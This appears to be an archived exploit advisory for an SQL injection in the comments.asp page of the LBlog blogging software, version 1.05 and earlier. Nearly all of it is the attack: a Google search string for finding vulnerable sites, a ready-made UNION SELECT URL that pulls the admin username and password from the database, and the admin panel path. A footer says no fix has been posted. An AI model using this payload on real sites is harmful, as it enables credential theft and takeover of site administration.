LBlog <= 1.05 (comments.asp) Remote SQL Injection Vulnerability

2006-08-20 00:00:00

################################################################################
## ##

## LBlog <= "comments.asp" SQL Injection Exploit ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## Credit by | Chironex Fleckeri ##

## Mail | [email protected] ##

## Googledork | Powered By LBlog ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## ##
################################################################################

###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################

#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.